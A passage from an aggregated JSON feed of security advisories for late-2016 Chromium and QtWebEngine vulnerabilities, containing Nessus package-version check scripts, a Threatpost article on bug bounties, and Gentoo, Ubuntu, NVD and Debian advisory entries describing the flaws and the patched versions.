script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"chromium-55.0.2883.87-1.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:28:51", "bulletinFamily": "scanner", "description": "This update updates QtWebEngine to the 5.8.0 release. QtWebEngine\n5.8.0 is part of the Qt 5.8.0 release, but only the QtWebEngine\ncomponent is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.7.1:\nCVE-2016-5182, CVE-2016-5183, CVE-2016-5189, CVE-2016-5199,\nCVE-2016-5201, CVE-2016-5203, CVE-2016-5204, CVE-2016-5205,\nCVE-2016-5206, CVE-2016-5208, CVE-2016-5207, CVE-2016-5210,\nCVE-2016-5211, CVE-2016-5212, CVE-2016-5213, CVE-2016-5214,\nCVE-2016-5215. CVE-2016-5216, CVE-2016-5217, CVE-2016-5218,\nCVE-2016-5219, CVE-2016-5221, CVE-2016-5222, CVE-2016-5223,\nCVE-2016-5224, CVE-2016-5225, CVE-2016-9650 and CVE-2016-9651.\n\nOther immediately usable changes in QtWebEngine 5.8 include :\n\n - Based on Chromium 53.0.2785.148 with security fixes from\n Chromium up to version 55.0.2883.75. (5.7.1 was based on\n Chromium 49.0.2623.111 with security fixes from Chromium\n up to version 54.0.2840.87.)\n\n - The `view-source:` scheme is now supported.\n\n - User scripts now support metadata (`@include`,\n `@exclude`, `@match`) as in Greasemonkey.\n\n - Some `chrome:` schemes now supported, for instance\n `chrome://gpu`.\n\n - Several bugs were fixed, see\n https://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/cha\n nges-5.8.0 for details.\n\nThe following changes in QtWebEngine 5.8 require compile-time\napplication support and will only be available after applications are\nrebuilt (and patched to remove the checks for Qt 5.8, because Qt is\nstill version 5.7.1, only QtWebEngine is being updated) :\n\n - Spellchecking with a forked version of Hunspell. This\n Fedora package automatically converts system Hunspell\n dictionaries (installed by system RPMs into the\n systemwide location) to the Chromium `bdic` format used\n by QtWebEngine (using an RPM file trigger). If you wish\n to use dictionaries installed manually, use the included\n `qwebengine_convert_dict` tool. Alternatively, you can\n also download dictionaries directly in the Chromium\n `bdic` format.\n\n - Support for printing directly to a printer. (Note that\n QupZilla already supports printing to a printer, because\n it can use the printToPdf API that has existed since\n QtWebEngine 5.7 to print to a printer with the help of\n the `lpr` command-line tool. But other applications such\n as KMail require the new direct printing API.)\n\n - Added a setting to enable printing of CSS backgrounds.\n\nThe following new QML APIs are available to developers :\n\n - Tooltips (HTML5 global title attribute) are now also\n supported in the QML API.\n\n - Qt WebEngine (QML) allows defining custom dialogs /\n context menus.\n\n - Qt WebEngine (QML) on `eglfs` uses builtin dialogs based\n on Qt Quick Controls 2.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2017-C5B2C9A435.NASL", "href": "https://www.tenable.com/plugins/nessus/101716", "published": "2017-07-17T00:00:00", "title": "Fedora 26 : qt5-qtwebengine (2017-c5b2c9a435)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-c5b2c9a435.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101716);\n script_version(\"3.5\");\n script_cvs_date(\"Date: 2019/09/24 14:09:09\");\n\n script_cve_id(\"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5189\", \"CVE-2016-5199\", \"CVE-2016-5201\", \"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-9650\", \"CVE-2016-9651\");\n script_xref(name:\"FEDORA\", value:\"2017-c5b2c9a435\");\n\n script_name(english:\"Fedora 26 : qt5-qtwebengine (2017-c5b2c9a435)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update updates QtWebEngine to the 5.8.0 release. QtWebEngine\n5.8.0 is part of the Qt 5.8.0 release, but only the QtWebEngine\ncomponent is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.7.1:\nCVE-2016-5182, CVE-2016-5183, CVE-2016-5189, CVE-2016-5199,\nCVE-2016-5201, CVE-2016-5203, CVE-2016-5204, CVE-2016-5205,\nCVE-2016-5206, CVE-2016-5208, CVE-2016-5207, CVE-2016-5210,\nCVE-2016-5211, CVE-2016-5212, CVE-2016-5213, CVE-2016-5214,\nCVE-2016-5215. CVE-2016-5216, CVE-2016-5217, CVE-2016-5218,\nCVE-2016-5219, CVE-2016-5221, CVE-2016-5222, CVE-2016-5223,\nCVE-2016-5224, CVE-2016-5225, CVE-2016-9650 and CVE-2016-9651.\n\nOther immediately usable changes in QtWebEngine 5.8 include :\n\n - Based on Chromium 53.0.2785.148 with security fixes from\n Chromium up to version 55.0.2883.75. (5.7.1 was based on\n Chromium 49.0.2623.111 with security fixes from Chromium\n up to version 54.0.2840.87.)\n\n - The `view-source:` scheme is now supported.\n\n - User scripts now support metadata (`@include`,\n `@exclude`, `@match`) as in Greasemonkey.\n\n - Some `chrome:` schemes now supported, for instance\n `chrome://gpu`.\n\n - Several bugs were fixed, see\n https://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/cha\n nges-5.8.0 for details.\n\nThe following changes in QtWebEngine 5.8 require compile-time\napplication support and will only be available after applications are\nrebuilt (and patched to remove the checks for Qt 5.8, because Qt is\nstill version 5.7.1, only QtWebEngine is being updated) :\n\n - Spellchecking with a forked version of Hunspell. This\n Fedora package automatically converts system Hunspell\n dictionaries (installed by system RPMs into the\n systemwide location) to the Chromium `bdic` format used\n by QtWebEngine (using an RPM file trigger). If you wish\n to use dictionaries installed manually, use the included\n `qwebengine_convert_dict` tool. Alternatively, you can\n also download dictionaries directly in the Chromium\n `bdic` format.\n\n - Support for printing directly to a printer. (Note that\n QupZilla already supports printing to a printer, because\n it can use the printToPdf API that has existed since\n QtWebEngine 5.7 to print to a printer with the help of\n the `lpr` command-line tool. But other applications such\n as KMail require the new direct printing API.)\n\n - Added a setting to enable printing of CSS backgrounds.\n\nThe following new QML APIs are available to developers :\n\n - Tooltips (HTML5 global title attribute) are now also\n supported in the QML API.\n\n - Qt WebEngine (QML) allows defining custom dialogs /\n context menus.\n\n - Qt WebEngine (QML) on `eglfs` uses builtin dialogs based\n on Qt Quick Controls 2.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-c5b2c9a435\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.8.0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected qt5-qtwebengine package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"qt5-qtwebengine-5.8.0-8.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:54:23", "bulletinFamily": "info", "description": "Google is urging Windows, Mac and Linux users to update their Chrome browsers to fix multiple vulnerabilities that could allow malicious third parties to take control of targeted systems.\n\nReleased Thursday, Chrome version 55.0.2883.75 for Windows, Mac, and Linux fixes those security issues. It also introduces a number of new features to the browser to enhance the way it handles panning gestures and to support CSS automatic hyphenation.\n\nThe United States Computer Emergency Readiness Team (US-CERT) issued an alert around [the Chrome update](<https://www.us-cert.gov/ncas/current-activity/2016/12/01/Google-Releases-Security-Updates-Chrome>) on Thursday in conjunction with Google, [detailing a list of 26 bug bounty payments](<https://googlechromereleases.blogspot.com/2016/12/stable-channel-update-for-desktop.html>) totaling $70,000 paid to external researchers. According to Google, another 10 security fixes were tackled by Google itself.\n\nTopping the list of vulnerabilities are a dozen \u201chigh\u201d severity issues. Five of the flaws are tied to universal cross-site scripting vulnerabilities in Chrome\u2019s Blink component, a web browser engine developed as part of the open-source web browser project Chromium Project.\n\nSecurity researcher Mariusz Mlynski earned $22,500 for finding three of the high-severity bugs tied to cross site scripting errors in Blink. The Polish researcher found similar flaws in May, earning him [$15,000](<https://threatpost.com/researcher-pockets-30000-in-chrome-bounties/118337/>).\n\nFour other high-severity vulnerabilities are tied to Google\u2019s problem-plagued Chrome default PDF viewer, called PDFium. The flaw, [described by Google in June](<https://threatpost.com/google-patches-high-severity-browser-pdf-vulnerability/118580/>), had put users at risk if they were enticed to view a specially crafted PDF document with an embedded jpeg2000 image within the default PDF viewer. Google did not disclose specifics of this most recent PDFium vulnerability in Thursday\u2019s update.\n\nTwo more high-severity vulnerabilities are tied to Chrome\u2019s V8 JavaScript engine. One of the flaws is described as a \u201cprivate property access in V8\u201d vulnerability. The other V8 issue is a use after free vulnerability in V8. There were nine reported medium-severity flaws, two of which are related to Chrome\u2019s Omnibox (address bar) which hackers in the past have been able to use to spoof addresses.\n\nThe high and medium-severity bugs that earned bounties are:\n\n[$N/A]** High **CVE-2016-9651: Private property access in V8. _Credit to Guang Gong of Alpha Team Of Qihoo 360_\n\n[$7,500]** High **CVE-2016-5208: Universal XSS in Blink. _Credit to Mariusz Mlynski_\n\n[$7,500]** High **CVE-2016-5207: Universal XSS in Blink. _Credit to Mariusz Mlynski_\n\n[$7,500]** High **CVE-2016-5206: Same-origin bypass in PDFium. _Credit to Rob Wu _\n\n[$7,500]** High **CVE-2016-5205: Universal XSS in Blink. _Credit to Anonymous_\n\n[$7,500]** High **CVE-2016-5204: Universal XSS in Blink. _Credit to Mariusz Mlynski_\n\n[$5,000]** High **CVE-2016-5209: Out of bounds write in Blink. _Credit to Giwan Go of STEALIEN_\n\n[$3,000]** High **CVE-2016-5203: Use after free in PDFium. _Credit to Anonymous_\n\n[$3,500]** High **CVE-2016-5210: Out of bounds write in PDFium. _Credit to Ke Liu of Tencent\u2019s Xuanwu LAB_\n\n[$3,000]** High **CVE-2016-5212: Local file disclosure in DevTools. _Credit to Khalil Zhani_\n\n[$3,000]** High **CVE-2016-5211: Use after free in PDFium. _Credit to Anonymous_\n\n[$500]** High **CVE-2016-5213: Use after free in V8. _Credit to Khalil Zhani_\n\n[$N/A]** Medium **CVE-2016-5214: File download protection bypass. _Credit to Jonathan Birch and MSVR_\n\n[$3,000]** Medium **CVE-2016-5216: Use after free in PDFium. _Credit to Anonymous_\n\n[$3,000]** Medium **CVE-2016-5215: Use after free in Webaudio. _Credit to Looben Yang_\n\n[$2,500]** Medium **CVE-2016-5217: Use of unvalidated data in PDFium. _Credit to Rob Wu _\n\n[$2,000]** Medium **CVE-2016-5218: Address spoofing in Omnibox. _Credit to Abdulrahman Alqabandi (@qab)_\n\n[$1,500]** Medium **CVE-2016-5219: Use after free in V8. _Credit to Rob Wu _\n\n[$1,000]** Medium **CVE-2016-5221: Integer overflow in ANGLE. _Credit to Tim Becker of ForAllSecure_\n\n[$1,000]** Medium **CVE-2016-5220: Local file access in PDFium. _Credit to Rob Wu _\n\n[$500]** Medium **CVE-2016-5222: Address spoofing in Omnibox. _Credit to xisigr of Tencent\u2019s Xuanwu Lab_\n", "modified": "2016-12-08T22:46:33", "published": "2016-12-02T11:45:07", "id": "THREATPOST:8824503BC1A2C5007509D80EDDF5E01C", "href": "https://threatpost.com/google-fixes-12-high-severity-flaws-in-chrome-browser/122223/", "type": "threatpost", "title": "Google Fixes 12 High-Severity Vulnerabilities In Chrome Browser", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-12-05T00:54:42", "bulletinFamily": "unix", "description": "### Background\n\nChromium is an open-source browser project that aims to build a safer, faster, and more stable way for all users to experience the web. \n\n### Description\n\nMultiple vulnerabilities have been discovered in the Chromium web browser. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process, cause a Denial of Service condition, obtain sensitive information, or bypass security restrictions. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Chromium users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-client/chromium-55.0.2883.75\"", "modified": "2016-12-05T00:00:00", "published": "2016-12-05T00:00:00", "href": "https://security.gentoo.org/glsa/201612-11", "id": "GLSA-201612-11", "type": "gentoo", "title": "Chromium: Multiple vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntu": [{"lastseen": "2019-11-22T13:27:38", "bulletinFamily": "unix", "description": "Multiple vulnerabilities were discovered in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to conduct cross-site scripting (XSS) attacks, read uninitialized memory, obtain sensitive information, spoof the webview URL, bypass same origin restrictions, cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-5204, CVE-2016-5205, CVE-2016-5207, CVE-2016-5208, CVE-2016-5209, CVE-2016-5212, CVE-2016-5215, CVE-2016-5222, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226, CVE-2016-9650, CVE-2016-9652)\n\nMultiple vulnerabilities were discovered in V8. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to obtain sensitive information, cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-5213, CVE-2016-5219, CVE-2016-9651)\n\nAn integer overflow was discovered in ANGLE. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via application crash, or execute arbitrary code. (CVE-2016-5221)", "modified": "2016-12-09T00:00:00", "published": "2016-12-09T00:00:00", "id": "USN-3153-1", "href": "https://usn.ubuntu.com/3153-1/", "title": "Oxide vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "A timing attack on denormalized floating point arithmetic in SVG filters in Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to bypass the Same Origin Policy via a crafted HTML page.", "modified": "2018-01-05T02:30:00", "id": "CVE-2016-5224", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5224", "published": "2017-01-19T05:59:00", "title": "CVE-2016-5224", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:15:41", "bulletinFamily": "NVD", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly handled iframes, which allowed a remote attacker to bypass a no-referrer policy via a crafted HTML page.", "modified": "2018-01-05T02:31:00", "id": "CVE-2016-9650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9650", "published": "2017-01-19T05:59:00", "title": "CVE-2016-9650", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "Heap buffer overflow during TIFF image parsing in PDFium in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file.", "modified": "2018-01-05T02:30:00", "id": "CVE-2016-5210", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5210", "published": "2017-01-19T05:59:00", "title": "CVE-2016-5210", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "Incorrect handling of invalid URLs in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page.", "modified": "2018-01-05T02:30:00", "id": "CVE-2016-5222", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5222", "published": "2017-01-19T05:59:00", "title": "CVE-2016-5222", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "The extensions API in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android incorrectly permitted access to privileged plugins, which allowed a remote attacker to bypass site isolation via a crafted HTML page.", "modified": "2018-01-05T02:30:00", "id": "CVE-2016-5217", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5217", "published": "2017-01-19T05:59:00", "title": "CVE-2016-5217", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-11-22T13:22:11", "bulletinFamily": "NVD", "description": "A missing check for whether a property of a JS object is private in V8 in Google Chrome prior to 55.0.2883.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.", "modified": "2019-01-16T13:43:00", "id": "CVE-2016-9651", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9651", "published": "2019-01-09T19:29:00", "title": "CVE-2016-9651", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "Bad casting in bitmap manipulation in Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "modified": "2018-01-05T02:30:00", "id": "CVE-2016-5209", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5209", "published": "2017-01-19T05:59:00", "title": "CVE-2016-5209", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Linux, Windows and Mac, incorrectly handles deferred page loads, which allowed a remote attacker to inject arbitrary scripts or HTML (UXSS) via a crafted HTML page.", "modified": "2018-01-05T02:30:00", "id": "CVE-2016-5205", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5205", "published": "2017-01-19T05:59:00", "title": "CVE-2016-5205", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Linux, Windows and Mac executed javascript: URLs entered in the URL bar in the context of the current tab, which allowed a socially engineered user to XSS themselves by dragging and dropping a javascript: URL into the URL bar.", "modified": "2018-01-05T02:30:00", "id": "CVE-2016-5226", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5226", "published": "2017-01-19T05:59:00", "title": "CVE-2016-5226", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:15:37", "bulletinFamily": "NVD", "description": "Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux, and 55.0.2883.84 for Android insufficiently sanitized DevTools URLs, which allowed a remote attacker to read local files via a crafted HTML page.", "modified": "2018-01-05T02:30:00", "id": "CVE-2016-5212", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5212", "published": "2017-01-19T05:59:00", "title": "CVE-2016-5212", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "debian": [{"lastseen": "2019-11-22T22:11:23", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3731-1 security@debian.org\nhttps://www.debian.org/security/ Michael Gilbert\nDecember 11, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : chromium-browser\nCVE ID : CVE-2016-5181 CVE-2016-5182 CVE-2016-5183 CVE-2016-5184\n CVE-2016-5185 CVE-2016-5186 CVE-2016-5187 CVE-2016-5188\n CVE-2016-5189 CVE-2016-5190 CVE-2016-5191 CVE-2016-5192\n CVE-2016-5193 CVE-2016-5194 CVE-2016-5198 CVE-2016-5199\n CVE-2016-5200 CVE-2016-5201 CVE-2016-5202 CVE-2016-5203\n CVE-2016-5204 CVE-2016-5205 CVE-2016-5206 CVE-2016-5207\n CVE-2016-5208 CVE-2016-5209 CVE-2016-5210 CVE-2016-5211\n CVE-2016-5212 CVE-2016-5213 CVE-2016-5214 CVE-2016-5215\n CVE-2016-5216 CVE-2016-5217 CVE-2016-5218 CVE-2016-5219\n CVE-2016-5220 CVE-2016-5221 CVE-2016-5222 CVE-2016-5223\n CVE-2016-5224 CVE-2016-5225 CVE-2016-5226 CVE-2016-9650\n CVE-2016-9651 CVE-2016-9652\n\nSeveral vulnerabilities have been discovered in the chromium web browser.\n\nCVE-2016-5181\n\n A cross-site scripting issue was discovered.\n\nCVE-2016-5182\n\n Giwan Go discovered a heap overflow issue.\n\nCVE-2016-5183\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5184\n\n Another use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5185\n\n cloudfuzzer discovered a use-after-free issue in Blink/Webkit.\n\nCVE-2016-5186\n\n Abdulrahman Alqabandi discovered an out-of-bounds read issue in the\n developer tools.\n\nCVE-2016-5187\n\n Luan Herrera discovered a URL spoofing issue.\n\nCVE-2016-5188\n\n Luan Herrera discovered that some drop down menus can be used to\n hide parts of the user interface.\n\nCVE-2016-5189\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2016-5190\n\n Atte Kettunen discovered a use-after-free issue.\n\nCVE-2016-5191\n\n Gareth Hughes discovered a cross-site scripting issue.\n\nCVE-2016-5192\n\n haojunhou@gmail.com discovered a same-origin bypass.\n\nCVE-2016-5193\n\n Yuyang Zhou discovered a way to pop open a new window.\n\nCVE-2016-5194\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-5198\n\n Tencent Keen Security Lab discovered an out-of-bounds memory access\n issue in the v8 javascript library.\n\nCVE-2016-5199\n\n A heap corruption issue was discovered in the ffmpeg library.\n\nCVE-2016-5200\n\n Choongwoo Han discovered an out-of-bounds memory access issue in\n the v8 javascript library.\n\nCVE-2016-5201\n\n Rob Wu discovered an information leak.\n\nCVE-2016-5202\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nCVE-2016-5203\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5204\n\n Mariusz Mlynski discovered a cross-site scripting issue in SVG\n image handling.\n\nCVE-2016-5205\n\n A cross-site scripting issue was discovered.\n\nCVE-2016-5206\n\n Rob Wu discovered a same-origin bypass in the pdfium library.\n\nCVE-2016-5207\n\n Mariusz Mlynski discovered a cross-site scripting issue.\n\nCVE-2016-5208\n\n Mariusz Mlynski discovered another cross-site scripting issue.\n\nCVE-2016-5209\n\n Giwan Go discovered an out-of-bounds write issue in Blink/Webkit.\n\nCVE-2016-5210\n\n Ke Liu discovered an out-of-bounds write in the pdfium library.\n\nCVE-2016-5211\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5212\n\n Khalil Zhani discovered an information disclosure issue in the\n developer tools.\n\nCVE-2016-5213\n\n Khalil Zhani discovered a use-after-free issue in the v8 javascript\n library.\n\nCVE-2016-5214\n\n 